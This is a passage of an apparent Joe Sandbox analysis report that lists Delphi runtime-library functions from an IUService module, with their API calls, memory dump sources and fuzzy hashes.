                                                                                                                                              • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                                                              • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                                                            • @Character@TCharacter@IsLowSurrogate$qqrb.RTL120 ref: 5001055A
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120 ref: 50010570
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120 ref: 50010575
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$Character@$RaiseString$Except$qqrvException@$bctr$qqrp20Surrogate$qqrbSysutils@$AfterClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucHighList$qqrvLoadMetaObjectString$qqrp20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2248103522-0
                                                                                                                                            • Opcode ID: 573852c680a080bc0a97d15b87a50ebf7b650f53a3d381ad41dee1fe05933011
                                                                                                                                            • Instruction ID: d6cb0d2706df4e8aacf07fe5ab19d242fe700b88596e7abf658fbf432eafdb11
                                                                                                                                            • Opcode Fuzzy Hash: 573852c680a080bc0a97d15b87a50ebf7b650f53a3d381ad41dee1fe05933011
                                                                                                                                            • Instruction Fuzzy Hash: F5F0EC312014D107F7149BE8FD966A527E2DF542847008227FCC4C7313C55DCC459790
                                                                                                                                            Function 5002D28C Relevance: 9.0, APIs: 6, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D299
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2AB
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2BD
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2CF
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2E1
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2F3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Free$qqrvObject@System@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1799115918-0
                                                                                                                                            • Opcode ID: 57d29681f9056ac9329a7d325797a05bd985a2fc8562293051953311b1bf6d3d
                                                                                                                                            • Instruction ID: 768d9f2a40722debd25e9cdb4e8e1545f006035ae00f2926f4075c138192a15b
                                                                                                                                            • Opcode Fuzzy Hash: 57d29681f9056ac9329a7d325797a05bd985a2fc8562293051953311b1bf6d3d
                                                                                                                                            • Instruction Fuzzy Hash: F7F0B2B46059444FF714DBBBAC9147576F7EFE8360385C519D0548B125DF36D441DB40
                                                                                                                                            Function 50023964 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@StrCharLength$qqrpxb.RTL120(?), ref: 500239DB
                                                                                                                                            • @Sysutils@StrNextChar$qqrpxb.RTL120 ref: 500239F5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sysutils@$CharChar$qqrpxbLength$qqrpxbNext
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 4247032953-2852464175
                                                                                                                                            • Opcode ID: d4cd2c9e9290bb1fd43fec2215baa18dbef9c92e5702672488c2aa5db4bf2880
                                                                                                                                            • Instruction ID: e4e35325c6f34d9b65b87c66d780d8f477e977d8e87dd0103a07f57f46b7daee
                                                                                                                                            • Opcode Fuzzy Hash: d4cd2c9e9290bb1fd43fec2215baa18dbef9c92e5702672488c2aa5db4bf2880
                                                                                                                                            • Instruction Fuzzy Hash: 0731A53091658A8BDB10DFA8E8557EEB7F4EF05310F144226E844A76A2D3749E84C7A6
                                                                                                                                            Function 500069B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 500069D6
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,50006A25,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 50006A09
                                                                                                                                            • RegCloseKey.ADVAPI32(?,50006A2C,00000000,?,00000004,00000000,50006A25,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 50006A1F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                            • API String ID: 3677997916-4173385793
                                                                                                                                            • Opcode ID: 9ee370e70f06ee6609448c8435f7d602838b41d496a2b7e5916629935dfd1a17
                                                                                                                                            • Instruction ID: 68fb37e24ddefeba98026e83a54610ce6f8a69bb8d0a75ef775160f2897bda80
                                                                                                                                            • Opcode Fuzzy Hash: 9ee370e70f06ee6609448c8435f7d602838b41d496a2b7e5916629935dfd1a17
                                                                                                                                            • Instruction Fuzzy Hash: 5A01F579A50248BAF710DBE19C62FF977ECEB09720F504666FA04E3580E6349900CA55
                                                                                                                                            Function 500117F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500117F5
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50011807
                                                                                                                                              • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                                                              • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                                                              • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                                                            • @Character@TCharacter@IsAscii$qqrb.RTL120 ref: 50011849
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$Ascii$qqrbFindInitialize$qqrvLatin1$qqrbLoadLock
                                                                                                                                            • String ID: A$Z
                                                                                                                                            • API String ID: 2801340237-4098844585
                                                                                                                                            • Opcode ID: 3d7b16622b306a41cb389fb1ff8cb04a695359a54526d75529cb678f32deca9d
                                                                                                                                            • Instruction ID: 8de0f1dd0d009ed91e586fc1ea9b6193379de2375c44f7f3be455893678d8cca
                                                                                                                                            • Opcode Fuzzy Hash: 3d7b16622b306a41cb389fb1ff8cb04a695359a54526d75529cb678f32deca9d
                                                                                                                                            • Instruction Fuzzy Hash: 5701D651B181910BE71C5A619C513E833D26794302B5C827EE856CB6E3DF38C5D5E220
                                                                                                                                            Function 50010A54 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 50010A59
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50010A6B
                                                                                                                                              • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                                                              • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                                                              • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                                                            • @Character@TCharacter@IsAscii$qqrb.RTL120 ref: 50010AAD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$Ascii$qqrbFindInitialize$qqrvLatin1$qqrbLoadLock
                                                                                                                                            • String ID: a$z
                                                                                                                                            • API String ID: 2801340237-4151050625
                                                                                                                                            • Opcode ID: 68cc252f88e33736421a10eeeaa1cb58d10f880ea185927b8fcd1914d9384458
                                                                                                                                            • Instruction ID: 7fc53a10070eca12ef29afc55d4c6d512350c562e79b40b59943fefc8229aada
                                                                                                                                            • Opcode Fuzzy Hash: 68cc252f88e33736421a10eeeaa1cb58d10f880ea185927b8fcd1914d9384458
                                                                                                                                            • Instruction Fuzzy Hash: 3401F951B142D04BE7184B71AC512E937D2AB80302BC9417EF4C3CB697DBBD85D5E721
                                                                                                                                            Function 5002483C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002485E
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 50024866
                                                                                                                                            • @Sysutils@AnsiStrPos$qqrpbt1.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002486C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$qqrx20StringSystem@System@@Unicode$AnsiPos$qqrpbt1Sysutils@
                                                                                                                                            • String ID: XlP$tlP
                                                                                                                                            • API String ID: 1532255607-7086264
                                                                                                                                            • Opcode ID: 991b3ea7feb4240ad0f450cbc532c132e9e449f5bec3a229383f214eb6be9b84
                                                                                                                                            • Instruction ID: 41cbf7802f78e1180780a1aded232e557ab5269dbb48a6fdf072be4a9a689297
                                                                                                                                            • Opcode Fuzzy Hash: 991b3ea7feb4240ad0f450cbc532c132e9e449f5bec3a229383f214eb6be9b84
                                                                                                                                            • Instruction Fuzzy Hash: ABF0A7A27161D69BE7509B68FC80B6E77E8DB55264F510A36EA88C7201DA35DC00C751
                                                                                                                                            Function 5000A2B4 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A2FE
                                                                                                                                            • @System@@NewUnicodeString$qqri.RTL120 ref: 5000A30F
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,00000000), ref: 5000A357
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A365
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A37A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$Asg$qqrr20Clr$qqrpvLength$qqrr20Move$qqrpxvpviStringString$qqriStringiStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2014283384-0
                                                                                                                                            • Opcode ID: b61eede90e767d8fde67cc97024370c853bfedd394de62c8fd1a2fb42fa9bf36
                                                                                                                                            • Instruction ID: 3378d5cb028a156183957ae48023e964bc14677264a5555a71f0aa01a3d2e280
                                                                                                                                            • Opcode Fuzzy Hash: b61eede90e767d8fde67cc97024370c853bfedd394de62c8fd1a2fb42fa9bf36
                                                                                                                                            • Instruction Fuzzy Hash: 7921C1317061A28FF714EE18E570A5EB3E5EBD2300FA1873AE945C7111EB22ED418751
                                                                                                                                            Function 500279E4 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 500279F6
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027ABC), ref: 50027A2F
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027ABC), ref: 50027A79
                                                                                                                                            • @Sysutils@NextCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027ABC), ref: 50027A96
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(50027AC3), ref: 50027AB6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%$FromInternalStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharClr$qqrpvIndex$qqrx27NextRef$qqrpvSysutils@T$us$i0$%i
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3584664094-0
                                                                                                                                            • Opcode ID: 829ff8f312fc26a680b5dcbd4d1ee6f714a82b71f8e0defcbae22146eaef4f83
                                                                                                                                            • Instruction ID: 5ba0f4aa9d540899a6946def5b7f71f7a7c44f4c34a077cce08fafb771b80344
                                                                                                                                            • Opcode Fuzzy Hash: 829ff8f312fc26a680b5dcbd4d1ee6f714a82b71f8e0defcbae22146eaef4f83
                                                                                                                                            • Instruction Fuzzy Hash: 8921C430A06186EFEB11DFA4EA51ABDB7F5EBC4220F6002B5D448E7251D770AF41DB92
                                                                                                                                            Function 5000A464 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                                                            • @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120(00000000,5000A525), ref: 5000A50A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FromSystem@System@@Unicode$AnsiCharLen$qqrr20Str$qqrr20StringStringx27System@%T$us$i0$%$InternalStringpbiStringpci
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1942119235-0
                                                                                                                                            • Opcode ID: fadb6b95d5fb1038a6ee0d324fefe7ba47ecd192cbbc44abc22f50522fcb7868
                                                                                                                                            • Instruction ID: ad8f59b466486c7b54756af4fb6304d0c882565156628c1f2bc0eb5e63542440
                                                                                                                                            • Opcode Fuzzy Hash: fadb6b95d5fb1038a6ee0d324fefe7ba47ecd192cbbc44abc22f50522fcb7868
                                                                                                                                            • Instruction Fuzzy Hash: 772108347025A4DFFB11DE64D9A55ADB3E5EBD6210BE04375E800C7305DBB4DE01D691
                                                                                                                                            Function 50027ACC Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
